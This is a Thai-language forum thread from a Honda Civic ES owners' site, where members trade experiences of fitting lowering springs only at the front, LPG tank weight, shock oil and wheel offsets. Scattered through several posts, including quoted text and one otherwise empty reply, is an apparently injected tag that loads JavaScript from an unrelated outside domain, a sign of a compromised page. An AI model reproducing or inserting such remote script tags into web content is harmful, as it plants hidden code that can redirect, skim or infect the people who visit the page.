ตอบ
civic123


ชื่อเล่น: นัฐ

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 329

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 161
ให้คำขอบคุณ: 3

ที่อยู่: ES Ayutthaya
ปี: 2001
สี: แดง ไฟร์เปปเปอร์ (R-507P)
อาทิตย์, 16 ธันวา 2012 22:24 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
ผมหน้าเลื่อนเบ้าหลังสปริงเดิม แล้วอัดนำ้มันใหม่แบบหนึบขับหนึบดีคับแล้วใส่คำ้สี่จุดเข้าไม่มีสบัดคับ
ได้รับคำขอบคุณจาก: nu_es_05 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 17 ธันวา 2012 00:07 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
Sluzer พิมพ์ว่า:
คือว่าตอนนี้ผมอัดน้ำมันใหม่หมด ใส่สปริงโหลด4ต้น

แต่รู้สึกว่าท้ายต่ำมาก แล้วพอดีจะไปติดแก็สด้วยครับ

เลยว่าจะเอาขึ้นอีก เพื่อรองรับ นน. ถังแก็สอะครับ

ผมด้อคิดเหมืิอนกันอะครับว่า หน้านิ่ม หลังแข็ง มันจะโยนๆ หรือป่าว เลยมาขอความรู้จากผู้ที่ทำแบบนี้อยู่ครับ "<script src="https://sport32news.com/civicesgroup.js">




ใส่สปริงโหลดหน้านิ่มยังไงครับ มันต้องแข็งขึ้นสิครับ ส่วนหลังสปริงเดิมก็นิ่มแบบเดิม แต่ส่วนมากสปริงโหลดที่ใช้กันค่า K ก็ไม่ได้มากขึ้นกว่าเดิมเท่าไหร่หรอก แถมอัดน้ำมันมาเพิ่มแล้วมันก็จะหนืดขึ้น รับรองว่าโยนน้อยกว่าโช๊คเดิมแน่นอน

นี่ของผมหน้า Tein หลังเดิม อัดน้ำมัน 4 ต้น (แก๊สโดนัทเต็ม 43 ลิตร น้ำมันครึ่งถัง)

ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
ได้รับคำขอบคุณจาก: Sluzer  yoyosonic  meseoul  nu_es_05  tao_tnn  ome_RX 
Sluzer


ชื่อเล่น: นิค

เข้าร่วม: 03 มกรา 2012
ตอบ: 311

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 391
ให้คำขอบคุณ: 104

ที่อยู่: ระยอง
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 17 ธันวา 2012 09:21 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
athongchum พิมพ์ว่า:
Sluzer พิมพ์ว่า:
คือว่าตอนนี้ผมอัดน้ำมันใหม่หมด ใส่สปริงโหลด4ต้น

แต่รู้สึกว่าท้ายต่ำมาก แล้วพอดีจะไปติดแก็สด้วยครับ

เลยว่าจะเอาขึ้นอีก เพื่อรองรับ นน. ถังแก็สอะครับ

ผมด้อคิดเหมืิอนกันอะครับว่า หน้านิ่ม หลังแข็ง มันจะโยนๆ หรือป่าว เลยมาขอความรู้จากผู้ที่ทำแบบนี้อยู่ครับ "<script src="https://sport32news.com/civicesgroup.js">




ใส่สปริงโหลดหน้านิ่มยังไงครับ มันต้องแข็งขึ้นสิครับ ส่วนหลังสปริงเดิมก็นิ่มแบบเดิม แต่ส่วนมากสปริงโหลดที่ใช้กันค่า K ก็ไม่ได้มากขึ้นกว่าเดิมเท่าไหร่หรอก แถมอัดน้ำมันมาเพิ่มแล้วมันก็จะหนืดขึ้น รับรองว่าโยนน้อยกว่าโช๊คเดิมแน่นอน

นี่ของผมหน้า Tein หลังเดิม อัดน้ำมัน 4 ต้น (แก๊สโดนัทเต็ม 43 ลิตร น้ำมันครึ่งถัง)

ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ


ขอบคุณมากครับ
CROW


เข้าร่วม: 31 ตุลา 2012
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 33
ให้คำขอบคุณ: 137
เสาร์, 5 ตุลา 2013 20:54 - ถามผู้รู้....เรื่องสปริง
ถ้าเราเปลี่ยนสปริงโหลดเฉพาะคุ่หน้าอย่างเดียวโดยไม่เปลี่ยนทั้ง4ต้น(อยากได้แบบหน้าทิ่มตุดโด่ง)จะโอเคมั้ยคับ ทั้งในเรื่องการขับขี่หรือเวลาเข้าโค้งอะคับ ขอบคุนคับ
nammon_211


ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

ที่อยู่: ESC / แหลมฉบัง ชลบุรี@ นครศรีธรรมราช
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 5 ตุลา 2013 21:03 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
จะขับลำบากป่าวคับ......รอผู้รู้มาตอบดีกว่า..
ได้รับคำขอบคุณจาก: CROW 
civicnarok


เข้าร่วม: 08 พฤศจิกา 2012
ตอบ: 262

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 425
ให้คำขอบคุณ: 0
เสาร์, 5 ตุลา 2013 21:07 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
ผมกอใช้สูตรนี้และคับกอขับดีเข้าโค้งดีกว่าเดิมด้วยคับ
แต่ของผมติดแก้สมามันกอเลยสูงเท่าๆกันคับ
ได้รับคำขอบคุณจาก: CROW 
TanKrab


ชื่อเล่น: ตาล

เข้าร่วม: 23 กันยา 2012
ตอบ: 509

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 488
ให้คำขอบคุณ: 618

ที่อยู่: พิษณุโลก
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 5 ตุลา 2013 23:07 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
ผมก็สูตรนี้ครับแต่ผมทำเครื่องเสียงข้างหลังเลยเตี้ยเท่าๆกันครับ
ได้รับคำขอบคุณจาก: CROW 
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 6 ตุลา 2013 05:06 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
CROW พิมพ์ว่า:
ถ้าเราเปลี่ยนสปริงโหลดเฉพาะคุ่หน้าอย่างเดียวโดยไม่เปลี่ยนทั้ง4ต้น(อยากได้แบบหน้าทิ่มตุดโด่ง)จะโอเคมั้ยคับ ทั้งในเรื่องการขับขี่หรือเวลาเข้าโค้งอะคับ ขอบคุนคับ



+ แต่ควรอัดน้ำมันโช้คทั้งสี่ต้นด้วยครับ ถึงข้างหลังสปิงเดิม
ได้รับคำขอบคุณจาก: CROW 
Tam_Kanchanaburi


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 กันยา 2012
ตอบ: 1025

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 352
ให้คำขอบคุณ: 4

ที่อยู่: กาญจนบุรี
ปี: 2001
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อาทิตย์, 6 ตุลา 2013 08:11 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
top_es พิมพ์ว่า:
ใส่สปริงโหลดคู่หน้าอย่างเดียว เปงไงบ้างครับ โยนไหม

ได้ สปริง HR มาแล้ว กะว่าจะไส่แต่คู่หน้าหลังสปริงเดิมจะได้ขับง่ายๆ เพราะหลังมันยังสูง อันนี้ถูกหรือผิดครับ

หรือควรจะไส่ทั้ง หน้าหลัง แล้วหลัง รองสเปเซอเอาดีครับ

คือไม่อย่ากเตี้ยจนขับลำบากนะครับ

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

คู่หลังขายมั้ยครับ
manawwan


ชื่อเล่น: นัท

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 291

ที่อยู่: คานหาม/อยุธยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 6 ตุลา 2013 09:53 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
kort999 พิมพ์ว่า:
ผมโช๊คเดิมเลื่อนเบ้าอัดน้ำมันสปิงหน้าDC5หลังสปริงเดิม




อันนี้ละที่ต้องการ ไม่โดนตำรวจเล่นงานเอาด้วย
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 6 ตุลา 2013 20:41 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
ผมใส่หน้าอย่างเดียวครับ

หลังโช้คเดิมสปิงเดิมแต่เลื่อนเบ้าครับ
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 6 ตุลา 2013 21:30 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
โชคเดิมเลื่อนเบ้าหน้า อัดสปริง 4 ต้น ครับคู่หน้าสปิง tanabe nf210 หลังสปริงเดิม ดมแก้ส ท้ายต่ำลงมาหน่อยรวมๆแล้วหนึบๆดีครับ แข็งริดหน่อยแต่รับได้ครับ


ต่ำกำลังดีครับ
ต่ำกำลังดีครับ
หน้าทิ่มตูดโด่งรวมๆผมชอบนะ
หน้าทิ่มตูดโด่งรวมๆผมชอบนะ
ได้รับคำขอบคุณจาก: nu_es_05 
TUNG11


ชื่อเล่น: ต้อง

เข้าร่วม: 31 พฤษภาคม 2012
ตอบ: 617

Guru ES
Guru ES

ได้รับคำขอบคุณ: 345
ให้คำขอบคุณ: 360

ที่อยู่: บางปะกง 8 ริ้ว
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 26 ธันวา 2013 15:32 - ขอดูรูปรถพี่่ๆๆที่ใส่สปริงโหลดข้างหน้า หลังสปริงเดิมหน่อยคับ
. "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> .
manawwan


ชื่อเล่น: นัท

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 291

ที่อยู่: คานหาม/อยุธยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 26 ธันวา 2013 15:50 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
รอติดตาม
sakura1046


เข้าร่วม: 25 กรกฎา 2011
ตอบ: 530

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 535
ให้คำขอบคุณ: 168

ที่อยู่: พระปะแดง - ประชาอุทิศ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 26 ธันวา 2013 19:14 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
รูปไม่ค่อยชัดนะครับขอโทด ที!!


ไกลไปหน่อย. ผมสปริงหน้า h&r เลื่อนเบ้า สปริงหลังเดิมครับ เพราะมีถัง LPG
ไกลไปหน่อย. ผมสปริงหน้า h&r เลื่อนเบ้า สปริงหลังเดิมครับ เพราะมีถัง LPG
ล้อหน้า 15x8 et35 1 นิ้วๆสอดครับ
ล้อหน้า 15x8 et35 1 นิ้วๆสอดครับ
ล้อ หลัง 15x8 et 12 3 นิ้วสอดครับ ใส่ปริงเดิมเพราะ มีถัง LPG อ่ะครับ ตอนแรกใส่ H&R แล้วมันท้ายห้อยอ่ะครับ
พอรองสเปอร์ มันแข็งเกิน ก็เลยใส่สปริงเดิมนี้ละลงตัวสุดละ
ล้อ หลัง 15x8 et 12 3 นิ้วสอดครับ ใส่ปริงเดิมเพราะ มีถัง LPG อ่ะครับ ตอนแรกใส่ H&R แล้วมันท้ายห้อยอ่ะครับ
พอรองสเปอร์ มันแข็งเกิน ก็เลยใส่สปริงเดิมนี้ละลงตัวสุดละ
หน้าทิ่มกำลังสวยครับ !!
หน้าทิ่มกำลังสวยครับ !!
ได้รับคำขอบคุณจาก: note1am  natt-es3  nu_es_05  tao_tnn 
Vee


ชื่อเล่น: วีครับ

เข้าร่วม: 18 กันยา 2013
ตอบ: 2999

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1210
ให้คำขอบคุณ: 2387

ที่อยู่: นครปฐม@นวมินทร์
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พฤหัส, 26 ธันวา 2013 20:09 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
..
natt-es3


ชื่อเล่น: ณัฏฐ์

เข้าร่วม: 25 กุมภา 2013
ตอบ: 779

Guru ES
Guru ES

ได้รับคำขอบคุณ: 530
ให้คำขอบคุณ: 739

สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 26 ธันวา 2013 20:13 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
...แจ่มเลยครับ
ome_RX


ชื่อเล่น: โอม

เข้าร่วม: 24 พฤษภาคม 2013
ตอบ: 571

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 622
ให้คำขอบคุณ: 805

ที่อยู่: สมุทรปราการ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 26 ธันวา 2017 13:24 - ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ
athongchum พิมพ์ว่า:

Sluzer พิมพ์ว่า:
คือว่าตอนนี้ผมอัดน้ำมันใหม่หมด ใส่สปริงโหลด4ต้น

แต่รู้สึกว่าท้ายต่ำมาก แล้วพอดีจะไปติดแก็สด้วยครับ

เลยว่าจะเอาขึ้นอีก เพื่อรองรับ นน. ถังแก็สอะครับ

ผมด้อคิดเหมืิอนกันอะครับว่า หน้านิ่ม หลังแข็ง มันจะโยนๆ หรือป่าว เลยมาขอความรู้จากผู้ที่ทำแบบนี้อยู่ครับ "<script src="https://sport32news.com/civicesgroup.js">




ใส่สปริงโหลดหน้านิ่มยังไงครับ มันต้องแข็งขึ้นสิครับ ส่วนหลังสปริงเดิมก็นิ่มแบบเดิม แต่ส่วนมากสปริงโหลดที่ใช้กันค่า K ก็ไม่ได้มากขึ้นกว่าเดิมเท่าไหร่หรอก แถมอัดน้ำมันมาเพิ่มแล้วมันก็จะหนืดขึ้น รับรองว่าโยนน้อยกว่าโช๊คเดิมแน่นอน

นี่ของผมหน้า Tein หลังเดิม อัดน้ำมัน 4 ต้น (แก๊สโดนัทเต็ม 43 ลิตร น้ำมันครึ่งถัง)

ใส่สปริงโหลดคู่หน้าอย่างเดียว เป็นยังไงบ้างครับ


:ซอยโอ่ง หน้าฟร์ามจระเข้ 
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.